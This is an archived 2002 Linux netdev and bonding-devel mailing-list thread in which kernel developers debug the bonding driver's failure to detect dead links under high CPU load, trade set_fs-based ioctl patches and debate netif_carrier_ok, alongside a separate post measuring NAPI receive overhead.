*/ etool.cmd = ETHTOOL_GLINK; ifr.ifr_data = (char*)&etool; - if (ioctl(dev, &ifr, SIOCETHTOOL) == 0) { + if (IOCTL(dev, &ifr, SIOCETHTOOL) == 0) { if (etool.data == 1) { return(MII_LINK_READY); } @@ -431,13 +453,13 @@ */ /* Yes, the mii is overlaid on the ifreq.ifr_ifru */ - mii = (struct mii_ioctl_data *)&ifr.ifr_data; - if (ioctl(dev, &ifr, SIOCGMIIPHY) != 0) { + mii = (struct mii_ioctl_data *)ifr.ifr_data; + if (IOCTL(dev, &ifr, SIOCGMIIPHY) != 0) { return MII_LINK_READY; /* can't tell */ } mii->reg_num = 1; - if (ioctl(dev, &ifr, SIOCGMIIREG) == 0) { + if (IOCTL(dev, &ifr, SIOCGMIIREG) == 0) { /* * mii->val_out contains MII reg 1, BMSR * 0x0004 means link established > -----Original Message----- > From: Andrew Morton [mailto:akpm@digeo.com] > Sent: Saturday, September 14, 2002 10:24 PM > To: Pascal Brisset > Cc: bonding-devel@lists.sourceforge.net; netdev@oss.sgi.com > Subject: [Bonding-devel] Re: Bonding driver unreliable under high CPU > load > > > Pascal Brisset wrote: > > > > I would like to confirm the problem reported by Tony Cureington at > > > http://sourceforge.net/mailarchive/forum.php?thread_id=1015008 > &forum_id=2094 > > > > Problem: In MII-monitoring mode, when the CPU load is high, > > the ethernet bonding driver silently fails to detect dead links. > > > > How to reproduce: > > i686, 2.4.19; "modprobe bonding mode=1 miimon=100"; ifenslave two > > interfaces; ping while you plug/unplug cables. Bonding will > > switch to the available interface, as expected. Now load the CPU > > with "while(1) { }", and failover will not work at all anymore. > > > > Explanation: > > The bonding driver monitors the state of its slave interfaces by > > calling their dev->do_ioctl(SIOCGMIIREG|ETHTOOL_GLINK) from a > > timer callback function. Whenever this occurs during a user task, > > the get_user() in the ioctl handling code of the slave fails with > > -EFAULT because the ifreq struct is allocated in the stack of the > > timer function, above 0xC0000000. 
In that case, the bonding driver > > considers the link up by default. > > > > This problem went unnoticed because for most applications, when the > > active link dies, the host becomes idle and the monitoring function > > gets a chance to run during a kernel thread (in which case > it works). > > The active-backup switchover is just slower than it should be. > > Serious trouble only happens when the active link dies > during a long, > > CPU-intensive job. > > > > Is anyone working on a fix ? Maybe running the monitoring stuff in > > a dedicated task ? > > Running the ioctl in interrupt context is bad. Probably what should > happen here is that the whole link monitoring function be pushed up > to process context via a schedule_task() callout, or a do it in a > dedicated kernel thread. > > This patch will probably make it work, but the slave device's > ioctl simply > isn't designed to be called from this context - it could try to take > a semaphore, or a non-interrupt-safe lock or anything. > > --- linux-2.4.20-pre7/drivers/net/bonding.c Thu Sep 12 20:35:22 2002 > +++ linux-akpm/drivers/net/bonding.c Sat Sep 14 20:23:45 2002 > @@ -208,6 +208,7 @@ > #include > #include > #include > +#include > #include > > #include > @@ -401,6 +402,7 @@ static u16 bond_check_dev_link(struct ne > struct ifreq ifr; > struct mii_ioctl_data *mii; > struct ethtool_value etool; > + int ioctl_ret; > > if ((ioctl = dev->do_ioctl) != NULL) { /* ioctl to > access MII */ > /* TODO: set pointer to correct ioctl on a per > team member */ > @@ -416,7 +418,13 @@ static u16 bond_check_dev_link(struct ne > /* effect... 
> */ > etool.cmd = ETHTOOL_GLINK; > ifr.ifr_data = (char*)&etool; > - if (ioctl(dev, &ifr, SIOCETHTOOL) == 0) { > + { > + mm_segment_t old_fs = get_fs(); > + set_fs(KERNEL_DS); > + ioctl_ret = ioctl(dev, &ifr, SIOCETHTOOL); > + set_fs(old_fs); > + } > + if (ioctl_ret == 0) { > if (etool.data == 1) { > return(MII_LINK_READY); > } > > > - > > > ------------------------------------------------------- > This sf.net email is sponsored by:ThinkGeek > Welcome to geek heaven. > http://thinkgeek.com/sf > _______________________________________________ > Bonding-devel mailing list > Bonding-devel@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/bonding-devel > From fubar@us.ibm.com Tue Sep 17 12:42:10 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:42:14 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJg9tG018686 for ; Tue, 17 Sep 2002 12:42:10 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g8HJkjj2143698; Tue, 17 Sep 2002 15:46:45 -0400 Received: from d03nm035.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by northrelay02.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g8HJke4I076310; Tue, 17 Sep 2002 15:46:41 -0400 From: "Jay Vosburgh" Importance: Normal Sensitivity: Subject: RE: [Bonding-devel] Re: Bonding driver unreliable under high CPU load To: "Cureington, Tony" Cc: "Andrew Morton" , "Pascal Brisset" , , X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: Date: Tue, 17 Sep 2002 12:46:37 -0700 X-MIMETrack: Serialize by Router on D03NM035/03/M/IBM(Release 5.0.10 |March 22, 2002) at 09/17/2002 01:46:43 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii X-archive-position: 218 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: fubar@us.ibm.com Precedence: bulk 
X-list: netdev Actually, judging from how other drivers do this, the mii_ioctl_data structure is really supposed to be assigned to &ifr.ifr_data. I dont believe there is any storage where ifr_data points, and the ifr_ifru union is 16 bytes, which is the size of the mii_ioctl_data structure. -J "Cureington, Tony" @lists.sourceforge.net on 09/17/2002 12:28:52 PM Sent by: bonding-devel-admin@lists.sourceforge.net To: "Andrew Morton" , "Pascal Brisset" cc: , Subject: RE: [Bonding-devel] Re: Bonding driver unreliable under high CPU load I've been running some similar code (on 2.4.18) that makes the ioctl a macro - we must handle the MII ioctls too. The patch below also corrects the mii pointer being assigned the address of a pointer (&ifr.ifr_data, ifr_data is a macro that produces a pointer) instead of the pointer itself. The patch: --- linux-2.4.20-pre7/drivers/net/bonding.c Tue Sep 17 09:54:35 2002 +++ linux-2.4.20-pre7_mod/drivers/net/bonding.c Tue Sep 17 11:18:28 2002 @@ -316,6 +316,28 @@ #define IS_UP(dev) ((((dev)->flags & (IFF_UP)) == (IFF_UP)) && \ (netif_running(dev) && netif_carrier_ok(dev))) +/* this IOCTL macro is used to prevent network drivers from returning -EFAULT + * from the ioctl, returning -EFAULT causes a link up status to be returned + * from bond_check_dev_link even when the link is even connected. this macro + * allows the get_user/copy_from_user in network drivers ioctls to work without + * intermittently returning -EFAULT. this turns off argument validity + * checking on the address passed to the network driver ioctl. 
+ * + * this method of turning off argument validity checking is also used in the + * following drivers: + * /usr/src/linux/drivers/addon/iscsi/; addon/cpip; net/hamradio; + * net/wan; sound/; + * + * ioctl must be set to dev->do_ioctl before this macro + */ +#define IOCTL(dev, arg, cmd) ({ \ + int ret; \ + mm_segment_t fs = get_fs(); \ + set_fs(get_ds()); \ + ret = ioctl(dev, arg, cmd); \ + set_fs(fs); \ + ret; }) + static void bond_restore_slave_flags(slave_t *slave) { slave->dev->flags = slave->original_flags; @@ -416,7 +438,7 @@ /* effect... */ etool.cmd = ETHTOOL_GLINK; ifr.ifr_data = (char*)&etool; - if (ioctl(dev, &ifr, SIOCETHTOOL) == 0) { + if (IOCTL(dev, &ifr, SIOCETHTOOL) == 0) { if (etool.data == 1) { return(MII_LINK_READY); } @@ -431,13 +453,13 @@ */ /* Yes, the mii is overlaid on the ifreq.ifr_ifru */ - mii = (struct mii_ioctl_data *)&ifr.ifr_data; - if (ioctl(dev, &ifr, SIOCGMIIPHY) != 0) { + mii = (struct mii_ioctl_data *)ifr.ifr_data; + if (IOCTL(dev, &ifr, SIOCGMIIPHY) != 0) { return MII_LINK_READY; /* can't tell */ } mii->reg_num = 1; - if (ioctl(dev, &ifr, SIOCGMIIREG) == 0) { + if (IOCTL(dev, &ifr, SIOCGMIIREG) == 0) { /* * mii->val_out contains MII reg 1, BMSR * 0x0004 means link established > -----Original Message----- > From: Andrew Morton [mailto:akpm@digeo.com] > Sent: Saturday, September 14, 2002 10:24 PM > To: Pascal Brisset > Cc: bonding-devel@lists.sourceforge.net; netdev@oss.sgi.com > Subject: [Bonding-devel] Re: Bonding driver unreliable under high CPU > load > > > Pascal Brisset wrote: > > > > I would like to confirm the problem reported by Tony Cureington at > > > http://sourceforge.net/mailarchive/forum.php?thread_id=1015008 > &forum_id=2094 > > > > Problem: In MII-monitoring mode, when the CPU load is high, > > the ethernet bonding driver silently fails to detect dead links. > > > > How to reproduce: > > i686, 2.4.19; "modprobe bonding mode=1 miimon=100"; ifenslave two > > interfaces; ping while you plug/unplug cables. 
Bonding will > > switch to the available interface, as expected. Now load the CPU > > with "while(1) { }", and failover will not work at all anymore. > > > > Explanation: > > The bonding driver monitors the state of its slave interfaces by > > calling their dev->do_ioctl(SIOCGMIIREG|ETHTOOL_GLINK) from a > > timer callback function. Whenever this occurs during a user task, > > the get_user() in the ioctl handling code of the slave fails with > > -EFAULT because the ifreq struct is allocated in the stack of the > > timer function, above 0xC0000000. In that case, the bonding driver > > considers the link up by default. > > > > This problem went unnoticed because for most applications, when the > > active link dies, the host becomes idle and the monitoring function > > gets a chance to run during a kernel thread (in which case > it works). > > The active-backup switchover is just slower than it should be. > > Serious trouble only happens when the active link dies > during a long, > > CPU-intensive job. > > > > Is anyone working on a fix ? Maybe running the monitoring stuff in > > a dedicated task ? > > Running the ioctl in interrupt context is bad. Probably what should > happen here is that the whole link monitoring function be pushed up > to process context via a schedule_task() callout, or a do it in a > dedicated kernel thread. > > This patch will probably make it work, but the slave device's > ioctl simply > isn't designed to be called from this context - it could try to take > a semaphore, or a non-interrupt-safe lock or anything. 
> > --- linux-2.4.20-pre7/drivers/net/bonding.c Thu Sep 12 20:35:22 2002 > +++ linux-akpm/drivers/net/bonding.c Sat Sep 14 20:23:45 2002 > @@ -208,6 +208,7 @@ > #include > #include > #include > +#include > #include > > #include > @@ -401,6 +402,7 @@ static u16 bond_check_dev_link(struct ne > struct ifreq ifr; > struct mii_ioctl_data *mii; > struct ethtool_value etool; > + int ioctl_ret; > > if ((ioctl = dev->do_ioctl) != NULL) { /* ioctl to > access MII */ > /* TODO: set pointer to correct ioctl on a per > team member */ > @@ -416,7 +418,13 @@ static u16 bond_check_dev_link(struct ne > /* effect... > */ > etool.cmd = ETHTOOL_GLINK; > ifr.ifr_data = (char*)&etool; > - if (ioctl(dev, &ifr, SIOCETHTOOL) == 0) { > + { > + mm_segment_t old_fs = get_fs(); > + set_fs(KERNEL_DS); > + ioctl_ret = ioctl(dev, &ifr, SIOCETHTOOL); > + set_fs(old_fs); > + } > + if (ioctl_ret == 0) { > if (etool.data == 1) { > return(MII_LINK_READY); > } > > > - > > > ------------------------------------------------------- > This sf.net email is sponsored by:ThinkGeek > Welcome to geek heaven. > http://thinkgeek.com/sf > _______________________________________________ > Bonding-devel mailing list > Bonding-devel@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/bonding-devel > ------------------------------------------------------- This SF.NET email is sponsored by: AMD - Your access to the experts on Hammer Technology! Open Source & Linux Developers, register now for the AMD Developer Symposium. 
Code: EX8664 http://www.developwithamd.com/developerlab _______________________________________________ Bonding-devel mailing list Bonding-devel@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/bonding-devel From Andrew.Morton@digeo.com Tue Sep 17 12:48:47 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:48:52 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJmltG019442 for ; Tue, 17 Sep 2002 12:48:47 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id MAA27639 for ; Tue, 17 Sep 2002 12:53:41 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091712574308077 ; Tue, 17 Sep 2002 12:57:43 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 12:53:40 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 12:53:36 -0700 Message-ID: <3D878841.EB580DE9@digeo.com> Date: Tue, 17 Sep 2002 12:53:37 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: Jeff Garzik CC: "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> <3D878675.3000403@mandrakesoft.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 17 Sep 2002 19:53:37.0115 (UTC) FILETIME=[E98242B0:01C25E83] X-archive-position: 219 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com 
Precedence: bulk X-list: netdev Jeff Garzik wrote: > > ... > Also, a further question: do you have access to the slave struct > net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all > that ioctl calling if it returns non-zero. Make that "avoid all that ioctl calling from interrupt context", which is a bug. Of the box-killing variety ;) From manfred@colorfullife.com Tue Sep 17 12:49:35 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:49:37 -0700 (PDT) Received: from dbl.q-ag.de (IDENT:root@dbl.q-ag.de [80.146.160.66]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJnXtG019773 for ; Tue, 17 Sep 2002 12:49:34 -0700 Received: from colorfullife.com (IDENT:root@localhost.localdomain [127.0.0.1]) by dbl.q-ag.de (8.11.6/8.11.6) with ESMTP id g8HJsWl11033 for ; Tue, 17 Sep 2002 21:54:32 +0200 Message-ID: <3D878877.9050303@colorfullife.com> Date: Tue, 17 Sep 2002 21:54:31 +0200 From: Manfred Spraul User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) X-Accept-Language: en, de MIME-Version: 1.0 To: netdev@oss.sgi.com Subject: Info: NAPI performance at "low" loads Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 220 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manfred@colorfullife.com Precedence: bulk X-list: netdev NAPI network drivers mask the rx interrupts in their interrupt handler, and reenable them in dev->poll(). In the worst case, that happens for every packet. I've tried to measure the overhead of that operation. The cpu time needed to receive 50k packets/sec: without NAPI: 53.7 % with NAPI: 59.9 % 50k packets/sec is the limit for NAPI; at higher packet rates the forced mitigation kicks in and every interrupt receives more than one packet. The cpu time was measured by busy-looping in user space; the numbers should be accurate to less than 1 %.
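[A rough sketch of the busy-loop measurement described in this message, not the actual loadtest program from the URL given further down. The 16384-byte memset() size is taken from the message itself; the helper names count_memset_loops() and cpu_load_percent(), and the use of clock_gettime(), are assumptions made for illustration only.]

```c
#define _POSIX_C_SOURCE 199309L
#include <string.h>
#include <time.h>

/* memset size quoted in the message for the load-measuring app */
#define BUF_SIZE 16384

static unsigned char buf[BUF_SIZE];
static volatile unsigned char sink; /* keeps the compiler from dropping the memset */

/* Hypothetical helper: call memset() in a tight loop for roughly
 * `seconds` of wall-clock time and return the number of loops done.
 * Fewer loops per interval means more CPU time was taken elsewhere,
 * e.g. by interrupt handling for received packets. */
static unsigned long count_memset_loops(double seconds)
{
    struct timespec start, now;
    unsigned long loops = 0;
    double elapsed;

    clock_gettime(CLOCK_MONOTONIC, &start);
    do {
        memset(buf, (int)(loops & 0xff), sizeof(buf));
        sink = buf[loops % sizeof(buf)];
        loops++;
        clock_gettime(CLOCK_MONOTONIC, &now);
        elapsed = (double)(now.tv_sec - start.tv_sec)
                + (double)(now.tv_nsec - start.tv_nsec) / 1e9;
    } while (elapsed < seconds);

    return loops;
}

/* Hypothetical helper: share of CPU time lost to other work, in percent,
 * given the loop count on an idle box and the count under network load. */
static double cpu_load_percent(unsigned long idle_loops,
                               unsigned long loaded_loops)
{
    if (idle_loops == 0)
        return 0.0;
    return 100.0 * (1.0 - (double)loaded_loops / (double)idle_loops);
}
```

[The idea would be to record the loop count once on an idle receiver and once while packets arrive, then compare the two. Reading the clock on every iteration adds some overhead of its own, so a real tool would likely check the time less often.]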
Summary: with my setup, the overhead is around 11 %. Could someone try to reproduce my results? Sender: # sendpkt 1 <10..50, go get a good packet rate> Receiver: $ loadtest Please disable any interrupt mitigation features of your nic, otherwise the mitigation will dramatically change the needed cpu time. The sender sends ICMP echo reply packets, evenly spaced by "memset(,,n*512)" between the syscalls. The cpu load was measured with a user space app that calls "memset(,,16384)" in a tight loop, and reports the number of loops per second. I've used a patched tulip driver, the current NAPI driver contains a loop that severely slows down the nic under such loads. The patch and my test apps are at http://www.q-ag.de/~manfred/loadtest hardware setup: Duron 700, VIA KT 133 no IO APIC, i.e. slow 8259 XT PIC. Accton tulip clone, ADMtek comet. crossover cable Sender: Celeron 1.13 GHz, rtl8139 -- Manfred From ctindel@falcon.csc.calpoly.edu Tue Sep 17 12:53:45 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:53:46 -0700 (PDT) Received: from falcon.csc.calpoly.edu (falcon.csc.calpoly.edu [129.65.242.5]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJrjtG021499 for ; Tue, 17 Sep 2002 12:53:45 -0700 Received: from falcon.csc.calpoly.edu (localhost [127.0.0.1]) by falcon.csc.calpoly.edu (8.12.2+Sun/8.12.2) with ESMTP id g8HJwOg1011663; Tue, 17 Sep 2002 12:58:24 -0700 (PDT) Received: from localhost (ctindel@localhost) by falcon.csc.calpoly.edu (8.12.2+Sun/8.12.2/Submit) with ESMTP id g8HJwOj5011660; Tue, 17 Sep 2002 12:58:24 -0700 (PDT) Date: Tue, 17 Sep 2002 12:58:24 -0700 (PDT) From: "Chad N. 
Tindel" To: Andrew Morton cc: Jeff Garzik , "Cureington, Tony" , Pascal Brisset , , Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload In-Reply-To: <3D878841.EB580DE9@digeo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 221 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ctindel@falcon.csc.calpoly.edu Precedence: bulk X-list: netdev > > Also, a further question: do you have access to the slave struct > > net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all > > that ioctl calling if it returns non-zero. > > Make that "avoid all that ioctl calling from interrupt context", which > is a bug. Of the box-killing variety ;) Will netif_carrier_ok(slave_dev) always work? Do all drivers support the __LINK_STATE_NOCARRIER flag? If so, is there any reason to call the ioctl in the first place? Chad From fubar@us.ibm.com Tue Sep 17 12:58:03 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:58:05 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJw3tG021923 for ; Tue, 17 Sep 2002 12:58:03 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.194.23]) by e34.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g8HK2cvv040352; Tue, 17 Sep 2002 16:02:39 -0400 Received: from d03nm035.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g8HK1KQ0097014; Tue, 17 Sep 2002 14:01:21 -0600 From: "Jay Vosburgh" Importance: Normal Sensitivity: Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPU load To: Jeff Garzik Cc: "Cureington, Tony" , Andrew Morton , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: Date: Tue, 17 Sep 2002 
13:01:19 -0700 X-MIMETrack: Serialize by Router on D03NM035/03/M/IBM(Release 5.0.10 |March 22, 2002) at 09/17/2002 02:01:21 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii X-archive-position: 222 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: fubar@us.ibm.com Precedence: bulk X-list: netdev Well, now that it's been pointed out to me, that does look pretty grotty. It works because MII_LINK_READY is defined to be 4, and the return from bond_check_dev_link() is always a bitwise test against MII_LINK_READY, so it works. Could be cleaner, though. As far as netif_carrier_ok() goes, is it reliable? In looking at the drivers, it appears that some don't update the flag (e.g., 3c59x.c). -J Jeff Garzik @lists.sourceforge.net on 09/17/2002 12:45:57 PM Sent by: bonding-devel-admin@lists.sourceforge.net To: "Cureington, Tony" cc: Andrew Morton , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPU load Cureington, Tony wrote: > /* Yes, the mii is overlaid on the ifreq.ifr_ifru */ > mii = (struct mii_ioctl_data *)&ifr.ifr_data; > if (ioctl(dev, &ifr, SIOCGMIIPHY) != 0) { > return MII_LINK_READY; /* can't tell */ > } > > mii->reg_num = 1; > if (ioctl(dev, &ifr, SIOCGMIIREG) == 0) { > /* > * mii->val_out contains MII reg 1, BMSR > * 0x0004 means link established > */ > return mii->val_out; > } Speaking of bonding, I wonder about the above code -- why do you return mii->val_out directly? AFAICS you should test BMSR_LSTATUS (a.k.a. 0x0004) and return MII_LINK_READY or zero -- not a bunch of random bits. The status word can certainly be non-zero even when link is absent. Also, a further question: do you have access to the slave struct net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all that ioctl calling if it returns non-zero. 
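[A minimal sketch of the BMSR check suggested above, written as stand-alone C rather than as a patch against bonding.c. BMSR_LSTATUS has the value it has in linux/mii.h (0x0004); MII_LINK_READY is given the value 4 as stated earlier in this thread; the helper name bmsr_to_link_state() is hypothetical.]

```c
#include <stdint.h>

/* Link-status bit of MII register 1 (BMSR), same value as in linux/mii.h. */
#define BMSR_LSTATUS   0x0004
/* Value reported in this thread for the bonding driver's MII_LINK_READY. */
#define MII_LINK_READY 4

/* Hypothetical helper: reduce a raw BMSR word to either MII_LINK_READY
 * or zero, instead of handing the whole status word back to the caller. */
static uint16_t bmsr_to_link_state(uint16_t bmsr)
{
    return (bmsr & BMSR_LSTATUS) ? MII_LINK_READY : 0;
}
```

[With a helper along these lines, a status word such as 0x7809 (capability bits set, link bit clear) maps to 0, while 0x782d (link bit set) maps to MII_LINK_READY, so callers no longer depend on masking the raw register themselves.]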
Jeff ------------------------------------------------------- This SF.NET email is sponsored by: AMD - Your access to the experts on Hammer Technology! Open Source & Linux Developers, register now for the AMD Developer Symposium. Code: EX8664 http://www.developwithamd.com/developerlab _______________________________________________ Bonding-devel mailing list Bonding-devel@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/bonding-devel From jgarzik@mandrakesoft.com Tue Sep 17 13:02:51 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:02:53 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HK2otG022742 for ; Tue, 17 Sep 2002 13:02:51 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rOdQ-00055D-00; Tue, 17 Sep 2002 21:07:49 +0100 Message-ID: <3D878B73.6080503@mandrakesoft.com> Date: Tue, 17 Sep 2002 16:07:15 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Chad N. Tindel" CC: Andrew Morton , "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 223 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev Chad N. Tindel wrote: >>>Also, a further question: do you have access to the slave struct >>>net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all >>>that ioctl calling if it returns non-zero. 
>> >>Make that "avoid all that ioctl calling from interrupt context", which >>is a bug. Of the box-killing variety ;) > > > Will netif_carrier_ok(slave_dev) always work? Do all drivers support the > __LINK_STATE_NOCARRIER flag? No. Read again the precise language I used :) From jgarzik@mandrakesoft.com Tue Sep 17 13:06:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:06:39 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HK6atG023151 for ; Tue, 17 Sep 2002 13:06:37 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rOh5-0005CO-00; Tue, 17 Sep 2002 21:11:35 +0100 Message-ID: <3D878C56.2070400@mandrakesoft.com> Date: Tue, 17 Sep 2002 16:11:02 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andrew Morton CC: "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> <3D878675.3000403@mandrakesoft.com> <3D878841.EB580DE9@digeo.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 224 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev Andrew Morton wrote: > Jeff Garzik wrote: > >>... >>Also, a further question: do you have access to the slave struct >>net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all >>that ioctl calling if it returns non-zero. 
> > > Make that "avoid all that ioctl calling from interrupt context", which > is a bug. Of the box-killing variety ;) Indeed. /me looks at the bond_check_dev_link callers more closely and shudders. That wants fixing... Note that netif_carrier_ok() can indeed be checked in interrupt context. And if someone wants to send me patches converting more drivers to use netif_carrier_{on,off}, I would be very happy :) From ctindel@falcon.csc.calpoly.edu Tue Sep 17 13:06:55 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:06:56 -0700 (PDT) Received: from falcon.csc.calpoly.edu (falcon.csc.calpoly.edu [129.65.242.5]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HK6ttG023240 for ; Tue, 17 Sep 2002 13:06:55 -0700 Received: from falcon.csc.calpoly.edu (localhost [127.0.0.1]) by falcon.csc.calpoly.edu (8.12.2+Sun/8.12.2) with ESMTP id g8HKBUg1012188; Tue, 17 Sep 2002 13:11:30 -0700 (PDT) Received: from localhost (ctindel@localhost) by falcon.csc.calpoly.edu (8.12.2+Sun/8.12.2/Submit) with ESMTP id g8HKBTvY012185; Tue, 17 Sep 2002 13:11:29 -0700 (PDT) Date: Tue, 17 Sep 2002 13:11:29 -0700 (PDT) From: "Chad N. Tindel" To: Jeff Garzik cc: Andrew Morton , "Cureington, Tony" , Pascal Brisset , , Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload In-Reply-To: <3D878B73.6080503@mandrakesoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 225 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ctindel@falcon.csc.calpoly.edu Precedence: bulk X-list: netdev > > Will netif_carrier_ok(slave_dev) always work? Do all drivers support the > > __LINK_STATE_NOCARRIER flag? > > > No. Read again the precise language I used :) Right, well, that's what I thought. But how can we do what Andrew wants?
